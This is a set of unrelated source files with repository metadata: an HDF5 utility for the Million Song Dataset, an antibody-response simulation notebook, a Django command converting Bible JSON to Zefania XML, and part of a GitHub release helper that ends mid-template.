expectedrows=expectedrows)
# group musicbrainz
group = h5.createGroup("/",'musicbrainz','data about the song coming from MusicBrainz')
table = h5.createTable(group,'songs',DESC.SongMusicBrainz,'table of data coming from MusicBrainz',
expectedrows=expectedrows)
# create arrays
if not summaryfile:
create_all_arrays(h5,expectedrows=expectedrows)
# close it, done
h5.close()
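# Illustrative aggregate workflow (names are hypothetical; 'song_files' is a
# list of per-song .h5 paths created as above):
#   create_aggregate_file('msd_subset.h5', expectedrows=10000, force=True)
#   h5 = open_h5_file_append('msd_subset.h5')
#   fill_hdf5_aggregate_file(h5, song_files)
#   h5.close()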
def create_all_arrays(h5,expectedrows=1000):
"""
Utility function used by both create_song_file and create_aggregate_file,
creates all the EArrays (empty).
INPUT
h5 - hdf5 file, open with write or append permissions
metadata and analysis groups already exist!
"""
# group metadata arrays
group = h5.root.metadata
h5.createEArray(where=group,name='similar_artists',atom=tables.StringAtom(20,shape=()),shape=(0,),title=ARRAY_DESC_SIMILAR_ARTISTS)
h5.createEArray(group,'artist_terms',tables.StringAtom(256,shape=()),(0,),ARRAY_DESC_ARTIST_TERMS,
expectedrows=expectedrows*40)
h5.createEArray(group,'artist_terms_freq',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_ARTIST_TERMS_FREQ,
expectedrows=expectedrows*40)
h5.createEArray(group,'artist_terms_weight',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_ARTIST_TERMS_WEIGHT,
expectedrows=expectedrows*40)
# group analysis arrays
group = h5.root.analysis
h5.createEArray(where=group,name='segments_start',atom=tables.Float64Atom(shape=()),shape=(0,),title=ARRAY_DESC_SEGMENTS_START)
h5.createEArray(group,'segments_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SEGMENTS_CONFIDENCE,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_pitches',tables.Float64Atom(shape=()),(0,12),ARRAY_DESC_SEGMENTS_PITCHES,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_timbre',tables.Float64Atom(shape=()),(0,12),ARRAY_DESC_SEGMENTS_TIMBRE,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_loudness_max',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SEGMENTS_LOUDNESS_MAX,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_loudness_max_time',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SEGMENTS_LOUDNESS_MAX_TIME,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_loudness_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SEGMENTS_LOUDNESS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'sections_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SECTIONS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'sections_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SECTIONS_CONFIDENCE,
expectedrows=expectedrows*300)
h5.createEArray(group,'beats_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_BEATS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'beats_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_BEATS_CONFIDENCE,
expectedrows=expectedrows*300)
h5.createEArray(group,'bars_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_BARS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'bars_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_BARS_CONFIDENCE,
expectedrows=expectedrows*300)
h5.createEArray(group,'tatums_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_TATUMS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'tatums_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_TATUMS_CONFIDENCE,
expectedrows=expectedrows*300)
# group musicbrainz arrays
group = h5.root.musicbrainz
h5.createEArray(where=group,name='artist_mbtags',atom=tables.StringAtom(256,shape=()),shape=(0,),title=ARRAY_DESC_ARTIST_MBTAGS,
expectedrows=expectedrows*5)
h5.createEArray(group,'artist_mbtags_count',tables.IntAtom(shape=()),(0,),ARRAY_DESC_ARTIST_MBTAGS_COUNT,
expectedrows=expectedrows*5)
def open_h5_file_read(h5filename):
"""
Open an existing H5 in read mode.
"""
return tables.openFile(h5filename, mode='r')
def open_h5_file_append(h5filename):
"""
Open an existing H5 in append mode.
"""
return tables.openFile(h5filename, mode='a')
################################################ MAIN #####################################
def die_with_usage():
""" HELP MENU """
print 'hdf5_utils.py'
print 'by T. Bertin-Mahieux (2010) Columbia University'
print ''
print 'should be used as a library, contains functions to create'
print 'HDF5 files for the Million Song Dataset project'
sys.exit(0)
if __name__ == '__main__':
# help menu
die_with_usage()
|
apache-2.0
| 7,055,382,129,776,609,000
| 52.304267
| 137
| 0.664636
| false
| 3.349656
| false
| false
| false
|
blab/antibody-response-pulse
|
bcell-array/code/Virus_Bcell_IgM_IgG_Infection_OAS_new.py
|
1
|
13195
|
# coding: utf-8
# # Antibody Response Pulse
# https://github.com/blab/antibody-response-pulse
#
# ### B-cells evolution --- cross-reactive antibody response after influenza virus infection or vaccination
# ### Adaptive immune response for repeated infection
# In[3]:
'''
author: Alvason Zhenhua Li
date: 04/09/2015
'''
get_ipython().magic(u'matplotlib inline')
import numpy as np
import matplotlib.pyplot as plt
import os
from matplotlib.ticker import FuncFormatter
import alva_machinery_event_OAS_new as alva
AlvaFontSize = 23
AlvaFigSize = (15, 5)
numberingFig = 0
# plotting
dir_path = '/Users/al/Desktop/GitHub/antibody-response-pulse/bcell-array/figure'
file_name = 'Virus-Bcell-IgM-IgG'
figure_name = '-equation'
file_suffix = '.png'
save_figure = os.path.join(dir_path, file_name + figure_name + file_suffix)
numberingFig = numberingFig + 1
plt.figure(numberingFig, figsize=(12, 5))
plt.axis('off')
plt.title(r'$ Virus-Bcell-IgM-IgG \ equations \ (antibody-response \ for \ repeated-infection) $'
, fontsize = AlvaFontSize)
plt.text(0, 7.0/9, r'$ \frac{\partial V_n(t)}{\partial t} = +\mu_{v}V_{n}(t)(1 - \frac{V_n(t)}{V_{max}}) - \phi_{m} M_{n}(t) V_{n}(t) - \phi_{g} G_{n}(t) V_{n}(t) $'
, fontsize = 1.2*AlvaFontSize)
plt.text(0, 5.0/9, r'$ \frac{\partial B_n(t)}{\partial t} = +\mu_{b}V_{n}(t)(1 - \frac{V_n(t)}{V_{max}}) + (\beta_{m} + \beta_{g}) V_{n}(t) B_{n}(t) - \mu_{b} B_{n}(t) + m_b V_{n}(t)\frac{B_{i-1}(t) - 2B_i(t) + B_{i+1}(t)}{(\Delta i)^2} $'
, fontsize = 1.2*AlvaFontSize)
plt.text(0, 3.0/9,r'$ \frac{\partial M_n(t)}{\partial t} = +\xi_{m} B_{n}(t) - \phi_{m} M_{n}(t) V_{n}(t) - \mu_{m} M_{n}(t) $'
, fontsize = 1.2*AlvaFontSize)
plt.text(0, 1.0/9,r'$ \frac{\partial G_n(t)}{\partial t} = +\xi_{g} B_{n}(t) - \phi_{g} G_{n}(t) V_{n}(t) - \mu_{g} G_{n}(t) + m_a V_{n}(t)\frac{G_{i-1}(t) - 2G_i(t) + G_{i+1}(t)}{(\Delta i)^2} $'
, fontsize = 1.2*AlvaFontSize)
plt.savefig(save_figure, dpi = 100)
plt.show()
# define the V-M-G partial differential equations
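# Naming convention in the solver arrays below (illustrative summary):
# V = virus load, B = B-cell population, M = IgM antibody, G = IgG antibody;
# VBMGxt[0..3] select the variable, and the second axis runs over the viral
# strains on the x grid defined further down.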
def dVdt_array(VBMGxt = [], *args):
# naming
V = VBMGxt[0]
B = VBMGxt[1]
M = VBMGxt[2]
G = VBMGxt[3]
x_totalPoint = VBMGxt.shape[1]
# there are n dSdt
dV_dt_array = np.zeros(x_totalPoint)
# each dSdt with the same equation form
dV_dt_array[:] = +inRateV*V[:]*(1 - V[:]/maxV) - killRateVm*M[:]*V[:] - killRateVg*G[:]*V[:]
return(dV_dt_array)
def dBdt_array(VBMGxt = [], *args):
# naming
V = VBMGxt[0]
B = VBMGxt[1]
M = VBMGxt[2]
G = VBMGxt[3]
x_totalPoint = VBMGxt.shape[1]
# there are n dSdt
dB_dt_array = np.zeros(x_totalPoint)
# each dSdt with the same equation form
Bcopy = np.copy(B)
centerX = Bcopy[:]
leftX = np.roll(Bcopy[:], 1)
rightX = np.roll(Bcopy[:], -1)
leftX[0] = centerX[0]
rightX[-1] = centerX[-1]
dB_dt_array[:] = +inRateB*V[:]*(1 - V[:]/maxV) + (actRateBm + alva.event_active + alva.event_OAS_B)*V[:]*B[:] - outRateB*B[:] + mutatRateB*V[:]*(leftX[:] - 2*centerX[:] + rightX[:])/(dx**2)
return(dB_dt_array)
def dMdt_array(VBMGxt = [], *args):
# naming
V = VBMGxt[0]
B = VBMGxt[1]
M = VBMGxt[2]
G = VBMGxt[3]
x_totalPoint = VBMGxt.shape[1]
# there are n dSdt
dM_dt_array = np.zeros(x_totalPoint)
# each dSdt with the same equation form
dM_dt_array[:] = +inRateM*B[:] - consumeRateM*M[:]*V[:] - outRateM*M[:]
return(dM_dt_array)
def dGdt_array(VBMGxt = [], *args):
# naming
V = VBMGxt[0]
B = VBMGxt[1]
M = VBMGxt[2]
G = VBMGxt[3]
x_totalPoint = VBMGxt.shape[1]
# there are n dSdt
dG_dt_array = np.zeros(x_totalPoint)
# each dSdt with the same equation form
Gcopy = np.copy(G)
centerX = Gcopy[:]
leftX = np.roll(Gcopy[:], 1)
rightX = np.roll(Gcopy[:], -1)
leftX[0] = centerX[0]
rightX[-1] = centerX[-1]
dG_dt_array[:] = +(inRateG + alva.event_OAS)*B[:] - consumeRateG*G[:]*V[:] - outRateG*G[:] + mutatRateA*(leftX[:] - 2*centerX[:] + rightX[:])/(dx**2)
return(dG_dt_array)
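# Note: (leftX - 2*centerX + rightX)/(dx**2) in dBdt_array and dGdt_array is
# the second-difference stencil approximating the mutation/diffusion term
# d^2/di^2 in the equations plotted above; copying the edge values into
# leftX[0] and rightX[-1] gives zero-flux (reflecting) boundaries.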
# In[7]:
# setting parameter
timeUnit = 'day'
if timeUnit == 'hour':
hour = float(1)
day = float(24)
elif timeUnit == 'day':
day = float(1)
hour = float(1)/24
elif timeUnit == 'year':
year = float(1)
day = float(1)/365
hour = float(1)/24/365
maxV = float(50) # max virus/micro-liter
inRateV = 0.2/hour # in-rate of virus
killRateVm = 0.0003/hour # kill-rate of virus by antibody-IgM
killRateVg = killRateVm # kill-rate of virus by antibody-IgG
inRateB = 0.06/hour # in-rate of B-cell
outRateB = inRateB/8 # out-rate of B-cell
actRateBm = killRateVm # activation rate of naive B-cell
inRateM = 0.16/hour # in-rate of antibody-IgM from naive B-cell
outRateM = inRateM/1 # out-rate of antibody-IgM from naive B-cell
consumeRateM = killRateVm # consume-rate of antibody-IgM by cleaning virus
inRateG = inRateM/10 # in-rate of antibody-IgG from memory B-cell
outRateG = outRateM/250 # out-rate of antibody-IgG from memory B-cell
consumeRateG = killRateVg # consume-rate of antibody-IgG by cleaning virus
mutatRateB = 0.00003/hour # B-cell mutation rate
mutatRateA = 0.0001/hour # antibody mutation rate
mutatRateB = 0.0000/hour # B-cell mutation rate
mutatRateA = 0.000/hour # antibody mutation rate
# time boundary and griding condition
minT = float(0)
maxT = float(6*28*day)
totalPoint_T = int(1*10**3 + 1)
gT = np.linspace(minT, maxT, totalPoint_T)
spacingT = np.linspace(minT, maxT, num = totalPoint_T, retstep = True)
gT = spacingT[0]
dt = spacingT[1]
# space boundary and griding condition
minX = float(0)
maxX = float(3)
totalPoint_X = int(maxX - minX + 1)
gX = np.linspace(minX, maxX, totalPoint_X)
gridingX = np.linspace(minX, maxX, num = totalPoint_X, retstep = True)
gX = gridingX[0]
dx = gridingX[1]
gV_array = np.zeros([totalPoint_X, totalPoint_T])
gB_array = np.zeros([totalPoint_X, totalPoint_T])
gM_array = np.zeros([totalPoint_X, totalPoint_T])
gG_array = np.zeros([totalPoint_X, totalPoint_T])
# initial output condition
#gV_array[1, 0] = float(2)
#[pre-parameter, post-parameter, recovered-day, OAS+, OAS-]
actRateBg_1st = 0.0002/hour # activation rate of memory B-cell at 1st time (pre-)
actRateBg_2nd = actRateBg_1st*10 # activation rate of memory B-cell at 2nd time (post-)
origin_virus = int(1)
current_virus = int(2)
event_parameter = np.array([[actRateBg_1st,
actRateBg_2nd,
14*day,
+5/hour,
-actRateBm - actRateBg_1st + (actRateBm + actRateBg_1st)/3,
origin_virus,
current_virus]])
# [viral population, starting time] ---first
infection_period = 1*28*day
viral_population = np.zeros(int(maxX + 1))
viral_population[origin_virus:current_virus + 1] = 3
infection_starting_time = np.arange(int(maxX + 1))*infection_period
event_1st = np.zeros([int(maxX + 1), 2])
event_1st[:, 0] = viral_population
event_1st[:, 1] = infection_starting_time
print ('event_1st = {:}'.format(event_1st))
# [viral population, starting time] ---2nd
viral_population = np.zeros(int(maxX + 1))
viral_population[origin_virus:current_virus + 1] = 0
infection_starting_time = np.arange(int(maxX + 1))*0
event_2nd = np.zeros([int(maxX + 1), 2])
event_2nd[:, 0] = viral_population
event_2nd[:, 1] = infection_starting_time
print ('event_2nd = {:}'.format(event_2nd))
event_table = np.array([event_parameter, event_1st, event_2nd])
# Runge Kutta numerical solution
pde_array = np.array([dVdt_array, dBdt_array, dMdt_array, dGdt_array])
initial_Out = np.array([gV_array, gB_array, gM_array, gG_array])
gOut_array = alva.AlvaRungeKutta4XT(pde_array, initial_Out, minX, maxX, totalPoint_X, minT, maxT, totalPoint_T, event_table)
# plotting
gV = gOut_array[0]
gB = gOut_array[1]
gM = gOut_array[2]
gG = gOut_array[3]
numberingFig = numberingFig + 1
for i in range(totalPoint_X):
figure_name = '-response-%i'%(i)
figure_suffix = '.png'
    save_figure = os.path.join(dir_path, file_name + figure_name + figure_suffix)
plt.figure(numberingFig, figsize = AlvaFigSize)
plt.plot(gT, gV[i], color = 'red', label = r'$ V_{%i}(t) $'%(i), linewidth = 3.0, alpha = 0.5)
plt.plot(gT, gM[i], color = 'blue', label = r'$ IgM_{%i}(t) $'%(i), linewidth = 3.0, alpha = 0.5)
plt.plot(gT, gG[i], color = 'green', label = r'$ IgG_{%i}(t) $'%(i), linewidth = 3.0, alpha = 0.5)
plt.plot(gT, gM[i] + gG[i], color = 'gray', linewidth = 5.0, alpha = 0.5, linestyle = 'dashed'
, label = r'$ IgM_{%i}(t) + IgG_{%i}(t) $'%(i, i))
plt.grid(True, which = 'both')
plt.title(r'$ Antibody \ from \ Virus-{%i} $'%(i), fontsize = AlvaFontSize)
plt.xlabel(r'$time \ (%s)$'%(timeUnit), fontsize = AlvaFontSize)
plt.ylabel(r'$ Neutralization \ \ titer $', fontsize = AlvaFontSize)
plt.xlim([minT, maxT])
plt.xticks(fontsize = AlvaFontSize*0.6)
plt.yticks(fontsize = AlvaFontSize*0.6)
plt.ylim([2**0, 2**14])
plt.yscale('log', basey = 2)
plt.legend(loc = (1,0), fontsize = AlvaFontSize)
plt.savefig(save_figure, dpi = 100)
plt.show()
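# the loop above saves one antibody-response figure per viral strain (V, IgM, IgG and IgM + IgG versus time)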
# In[5]:
# Experimental lab data from OAS paper
gT_lab = np.array([28, 28 + 7, 28 + 14, 28 + 28]) + 28
gPR8_lab = np.array([2**(9 + 1.0/10), 2**(13 - 1.0/5), 2**(13 + 1.0/3), 2**(13 - 1.0/4)])
standard_PR8 = gPR8_lab**(3.0/4)
gFM1_lab = np.array([0, 2**(6 - 1.0/5), 2**(7 - 1.0/4), 2**(8 + 1.0/4)])
standard_FM1 = gFM1_lab**(3.0/4)
bar_width = 2.0
# Sequential immunization graph
numberingFig = numberingFig + 1
plt.figure(numberingFig, figsize = (12, 6))
plt.subplot(111)
plt.plot(gT, (gM[origin_virus] + gG[origin_virus]), linewidth = 5.0, alpha = 0.5, color = 'gray'
, label = r'$ Origin-virus $')
plt.plot(gT, (gM[origin_virus + 1] + gG[origin_virus + 1]), linewidth = 5.0, alpha = 0.5, color = 'red'
, label = r'$ Subsequence-virus $')
plt.bar(gT_lab - bar_width/2, gPR8_lab, bar_width, alpha = 0.6, color = 'gray', yerr = standard_PR8
, error_kw = dict(elinewidth = 1, ecolor = 'black'), label = r'$ PR8-virus $')
plt.bar(gT_lab + bar_width/2, gFM1_lab, bar_width, alpha = 0.6, color = 'red', yerr = standard_FM1
, error_kw = dict(elinewidth = 1, ecolor = 'black'), label = r'$ FM1-virus $')
plt.grid(True, which = 'both')
plt.title(r'$ Original \ Antigenic \ Sin \ (sequential-infection)$', fontsize = AlvaFontSize)
plt.xlabel(r'$time \ (%s)$'%(timeUnit), fontsize = AlvaFontSize)
plt.ylabel(r'$ Neutralization \ \ titer $', fontsize = AlvaFontSize)
plt.xticks(fontsize = AlvaFontSize*0.6)
plt.yticks(fontsize = AlvaFontSize*0.6)
plt.xlim([minT, 6*30*day])
plt.ylim([2**5, 2**14])
plt.yscale('log', basey = 2)
# gca() returns the current axes; format the y-axis tick labels as integer powers of 2
plt.gca().yaxis.set_major_formatter(FuncFormatter(lambda x, pos: int(2**(np.log(x)/np.log(2)))))
#plt.gca().xaxis.set_major_locator(plt.MultipleLocator(7))
plt.legend(loc = (1, 0), fontsize = AlvaFontSize)
plt.show()
# In[6]:
# Experimental lab data from OAS paper
gT_lab = np.array([28, 28 + 7, 28 + 14, 28 + 28]) + 28
gPR8_lab = np.array([2**(9 + 1.0/10), 2**(13 - 1.0/5), 2**(13 + 1.0/3), 2**(13 - 1.0/4)])
standard_PR8 = gPR8_lab**(3.0/4)
gFM1_lab = np.array([0, 2**(6 - 1.0/5), 2**(7 - 1.0/4), 2**(8 + 1.0/4)])
standard_FM1 = gFM1_lab**(3.0/4)
bar_width = 1.0
# Sequential immunization graph
figure_name = '-Original-Antigenic-Sin-infection'
figure_suffix = '.png'
save_figure = os.path.join(dir_path, file_name + figure_name + figure_suffix)
numberingFig = numberingFig + 1
plt.figure(numberingFig, figsize = (12, 6))
plt.subplot(111)
plt.plot(gT, (gM[origin_virus] + gG[origin_virus]), linewidth = 5.0, alpha = 0.5, color = 'gray'
, label = r'$ Origin-virus $')
plt.plot(gT, (gM[origin_virus + 1] + gG[origin_virus + 1]), linewidth = 5.0, alpha = 0.5, color = 'red'
, label = r'$ Subsequence-virus $')
plt.bar(gT_lab - bar_width/2, gPR8_lab, bar_width, alpha = 0.6, color = 'gray', yerr = standard_PR8
, error_kw = dict(elinewidth = 1, ecolor = 'black'), label = r'$ PR8-virus $')
plt.bar(gT_lab + bar_width/2, gFM1_lab, bar_width, alpha = 0.6, color = 'red', yerr = standard_FM1
, error_kw = dict(elinewidth = 1, ecolor = 'black'), label = r'$ FM1-virus $')
plt.grid(True, which = 'both')
plt.title(r'$ Original \ Antigenic \ Sin \ (sequential-infection)$', fontsize = AlvaFontSize)
plt.xlabel(r'$time \ (%s)$'%(timeUnit), fontsize = AlvaFontSize)
plt.ylabel(r'$ Neutralization \ \ titer $', fontsize = AlvaFontSize)
plt.xticks(fontsize = AlvaFontSize*0.6)
plt.yticks(fontsize = AlvaFontSize*0.6)
plt.xlim([minT, 3*30*day])
plt.ylim([2**5, 2**14])
plt.yscale('log', basey = 2)
# gca() returns the current axes; format the y-axis tick labels as integer powers of 2
plt.gca().yaxis.set_major_formatter(FuncFormatter(lambda x, pos: int(2**(np.log(x)/np.log(2)))))
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(7))
plt.legend(loc = (1, 0), fontsize = AlvaFontSize)
plt.savefig(save_figure, dpi = 100, bbox_inches='tight')
plt.show()
# In[ ]:
|
gpl-2.0
| 6,642,361,420,170,856,000
| 38.154303
| 257
| 0.619856
| false
| 2.478865
| false
| false
| false
|
lucifurtun/myquotes
|
apps/search/bible/management/commands/zefania_xml_generator.py
|
1
|
2231
|
import json
from itertools import groupby
import xmltodict
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Generates zefania xml from different formats'
def handle(self, *args, **options):
with open('NTR.json') as f:
data = json.load(f)
current_b_number = 0
for item in data:
if item['chapter'] == 1 and item['verse'] == 1:
current_b_number += 1
item['b_number'] = current_b_number
grouped_books = groupby(data, lambda item: item['b_number'])
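        # itertools.groupby only groups consecutive items; this works because the verses arrive in book order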
books_list = []
for book_grouper, chapters in grouped_books:
chapters_list = []
grouped_chapters = groupby(chapters, lambda item: item['chapter'])
for chapter_grouper, verses in grouped_chapters:
chapters_list.append({
'number': chapter_grouper,
'items': list(verses)
})
books_list.append({
'title': chapters_list[0]['items'][0]['long_name'],
'number': int(book_grouper),
'items': chapters_list
})
with open('NTR.xml', 'w+') as f:
d = {
'XMLBIBLE': {
'BIBLEBOOK': [
{
'@bnumber': book['number'],
'@bname': book['title'],
'CHAPTER': [
{
'@cnumber': chapter['number'],
'VERS': [
{
'@vnumber': verse['verse'],
'#text': verse['text']
} for verse in chapter['items']
]
} for chapter in book['items']
]
} for book in books_list
]
}
}
f.write(xmltodict.unparse(d, pretty=True))
self.stdout.write(self.style.SUCCESS('Imported!'))
|
bsd-3-clause
| -6,679,120,634,669,536,000
| 32.298507
| 78
| 0.404303
| false
| 5.013483
| false
| false
| false
|
vcatechnology/cmake-boilerplate
|
cmake/pygh/__init__.py
|
1
|
25114
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
import json
import errno
import platform
import fileinput
import subprocess
from datetime import datetime, timezone
try:
import requests
except ImportError:
raise ImportError(
'Failed to import \'requests\', run \'pip install requests\'')
try:
import pystache
except ImportError:
raise ImportError(
'Failed to import \'pystache\', run \'pip install pystache\'')
class ReleaseError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class ExecuteCommandError(Exception):
def __init__(self, message, cmd, code, out, err):
self.message = message
self.cmd = cmd
self.code = code
self.out = out
self.err = err
def __str__(self):
return self.message
class EmptyLogger(object):
'''Provides an implementation of an empty logging function'''
def debug(self, *k, **kw):
pass
def info(self, *k, **kw):
pass
def warn(self, *k, **kw):
pass
def error(self, *k, **kw):
pass
def critical(self, *k, **kw):
pass
def setLevel(self, *k, **kw):
pass
class Version(object):
'''Represents a version number'''
def __init__(self, *k, **kw):
'''
        A version number can be instantiated with:
- a dot-separated string
- Version('1.2.3')
- an iterable
- Version([1, 2, 3])
          - separate arguments
- `Version(1, 2, 3)`
- another version class
- `Version(Version(1, 2, 3))`
- a dictionary
- `Version({'minor':2,'major':1,'patch':3})`
- keywords
- `Version(minor = 2,major = 1, patch = 3)`
'''
try:
version = (k[0].major, k[0].minor, k[0].patch)
except (AttributeError, TypeError):
try:
version = (kw['major'], kw['minor'], kw['patch'])
except (KeyError, TypeError):
try:
version = (k[0]['major'], k[0]['minor'], k[0]['patch'])
except (KeyError, TypeError):
if isinstance(k[0], str):
version = k[0].split('.')
else:
try:
version = (k[0][0], k[0][1], k[0][2])
except (IndexError, TypeError):
version = k
self.major = int(version[0])
self.minor = int(version[1])
self.patch = int(version[2])
def bump(self, category):
'''
Bumps the version number depending on the category
'''
setattr(self, category, getattr(self, category) + 1)
if category == 'major':
self.minor = 0
self.patch = 0
elif category == 'minor':
self.patch = 0
def __gt__(self, other):
return tuple(self) > tuple(other)
def __ge__(self, other):
return tuple(self) >= tuple(other)
def __lt__(self, other):
return tuple(self) < tuple(other)
def __le__(self, other):
return tuple(self) <= tuple(other)
def __eq__(self, other):
return tuple(self) == tuple(other)
def __ne__(self, other):
return tuple(self) != tuple(other)
def __getitem__(self, index):
'''
Allows iteration of the version number
'''
if index == 0:
return self.major
elif index == 1:
return self.minor
elif index == 2:
return self.patch
else:
raise IndexError('version index out of range')
def __repr__(self):
'''
Provides a dot-separated string representation of the version number
'''
return '%i.%i.%i' % (self.major, self.minor, self.patch)
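# Example (illustrative): v = Version('1.2.3'); v.bump('minor') makes v 1.3.0, while a 'major' bump would reset minor and patch to 0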
class GitVersion(Version):
'''A git repository version number'''
def __init__(self, *k, **kw):
'''
        A git version number can be instantiated with:
- a dot-separated string
- Version('1.2.3.ef3aa43d-dirty')
- an iterable
- Version([1, 2, 3, 'ef3aa43d', True])
          - separate arguments
- `Version(1, 2, 3, 'ef3aa43d', True)`
- another version class
- `Version(Version(1, 2, 3, 'ef3aa43d', True))`
- a dictionary
            - `Version({'minor':2,'major':1,'patch':3, 'commit': 'ef3aa43d', 'dirty': True})`
- keywords
- `Version(minor = 2,major = 1, patch = 3, commit ='ef3aa43d', dirty =True)`
'''
super(GitVersion, self).__init__(*k, **kw)
try:
version = (k[0].commit, k[0].dirty)
except (AttributeError, TypeError):
try:
version = (kw['commit'], kw['dirty'])
except (KeyError, TypeError):
try:
version = (k[0]['commit'], k[0]['dirty'])
except (KeyError, TypeError):
if isinstance(k[0], str):
version = k[0].split('.')[3]
else:
try:
version = (k[0][3], k[0][4])
except (IndexError, TypeError):
version = k[3:]
self.commit = str(version[0])
try:
self.dirty = bool(version[1])
except:
try:
split = self.commit.split('-')
self.dirty = (split[1] == 'dirty')
self.commit = split[0]
except:
self.dirty = False
try:
int(self.commit, 16)
except ValueError:
            raise ValueError('The git commit string is not hexadecimal: %s'
% self.commit)
def __repr__(self):
'''
Provides a dot-separated string representation of the version number
'''
string = '%s.%s' % (super(GitVersion, self).__repr__(),
self.commit[:8])
if self.dirty:
string += '-dirty'
return string
def find_exe_in_path(filename, path=None):
'''
Finds an executable in the PATH environment variable
'''
if platform.system() == 'Windows':
filename += '.exe'
if path is None:
path = os.environ.get('PATH', '')
    if isinstance(path, str):
        pathlist = path.split(os.pathsep)
    else:
        pathlist = path
    return [p for p in (os.path.join(d, filename) for d in pathlist) if os.path.exists(p)]
def execute_command(cmd,
error_message='Failed to run external program',
expected=0,
cwd=os.getcwd()):
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
cwd=cwd)
(out, err) = p.communicate()
if expected != None and p.returncode != expected:
raise ExecuteCommandError(error_message, cmd, p.returncode, out, err)
return (p.returncode, out, err)
def close_milestone(number, repo, token, logger=EmptyLogger()):
logger.debug('Closing milestone #%d for %s' % (number, repo))
number = int(number)
r = requests.patch('https://api.github.com/repos/%s/milestones/%d' %
(repo, number),
params={
'access_token': token,
},
json={
'state': 'closed',
})
if r.status_code != 200:
json = r.json()
message = json['message']
errors = json.get('errors', [])
for e in errors:
message += '\n - %s: %s: %s' % (e.get('resource', 'unknown'),
e.get('field', 'unknown'),
e.get('code', 'unknown'))
raise ReleaseError('Failed to close github milestone #%d: %s' %
(number, message))
logger.info('Closed milestone #%d' % number)
return r.json()
def get_milestones(repo, token, logger=EmptyLogger()):
logger.debug('Retrieving milestones for %s' % repo)
r = requests.get('https://api.github.com/repos/%s/milestones' % repo,
params={
'access_token': token,
})
if r.status_code != 200:
raise ReleaseError('Failed to retrieve github milestones from %s: %s' %
(repo, r.json()['message']))
return r.json()
def get_git_tag_version(path,
git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
logger.debug('Getting latest git tag version')
# Get the head commit
cmd = [git_executable, 'rev-parse', 'HEAD']
_, out, _ = execute_command(cmd,
'Failed to get HEAD revision of repository',
cwd=path)
commit = out.split('\n')[0].strip()
if commit == 'HEAD' or not commit:
commit = '0000000000000000000000000000000000000000'
# Check if dirty
dirty = False
cmd = [git_executable, 'diff-index', '--name-only', 'HEAD']
if execute_command(
cmd,
'Failed to check if the project had local modifications',
cwd=path)[1]:
dirty = True
cmd = [git_executable, 'status', '--porcelain']
if '?? ' in execute_command(
cmd,
'Failed to check if the project had local modifications',
cwd=path)[1]:
dirty = True
# Find the latest tag
cmd = [git_executable, 'describe', '--match=v[0-9]*', 'HEAD']
code, out, _ = execute_command(cmd, expected=None, cwd=path)
if code:
return GitVersion(0, 0, 0, commit, dirty)
# Parse the tag
    re_tag = re.compile(r'^v([0-9]+)\.([0-9]+)\.([0-9]+)(-[0-9]+-g[a-f0-9]+)?')
matches = re_tag.match(out)
major = int(matches.group(1))
minor = int(matches.group(2))
revision = int(matches.group(3))
version = GitVersion(major, minor, revision, commit, dirty)
logger.info('Latest git tag version %s' % version)
return version
re_remote_fetch_url = re.compile(
r'Fetch URL: (?:(?:(git)(?:@))|(?:(https)(?:://)))([^:/]+)[:/]([^/]+/[^.]+)(?:\.git)?')
def get_repo(path=os.getcwd(), git_executable=find_exe_in_path('git')):
if isinstance(git_executable, list):
git_executable = git_executable[0]
cmd = [git_executable, 'remote', 'show', '-n', 'origin']
code, out, err = execute_command(
cmd,
'Failed to get repository remote information',
cwd=path)
match = re_remote_fetch_url.search(out)
if not match:
raise ExecuteCommandError('Failed to match fetch url', cmd, code, out,
err)
protocol = match.group(1) or match.group(2)
server = match.group(3)
if server != 'github.com':
raise ExecuteCommandError('Repository is not from github', cmd, code,
out, err)
repo = match.group(4)
return repo
def get_git_version(git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
logger.debug('Getting git version')
_, out, _ = execute_command([git_executable, '--version'])
git_version = Version(out.replace('git version ', ''))
logger.debug('Using git %s' % git_version)
return git_version
changelog_template = \
'## [v{{version.to}}](https://github.com/{{repo}}/tree/v{{version.to}}) ({{date}})\n' \
'{{#version.from}}' \
'[Full Changelog](https://github.com/{{repo}}/compare/v{{version.from}}...v{{version.to}})' \
'{{/version.from}}' \
'{{#milestone}}' \
'{{#version.from}} {{/version.from}}' \
'[Milestone]({{html_url}})' \
'{{/milestone}}\n' \
'\n' \
'{{description}}\n' \
'\n' \
'**Closed issues:**\n' \
'{{#issues}}\n' \
'\n' \
' - {{title}} [\#{{number}}]({{html_url}})\n' \
'{{/issues}}\n' \
'{{^issues}}\n' \
'\n' \
'_None_\n' \
'{{/issues}}\n' \
'\n' \
'**Merged pull requests:**\n' \
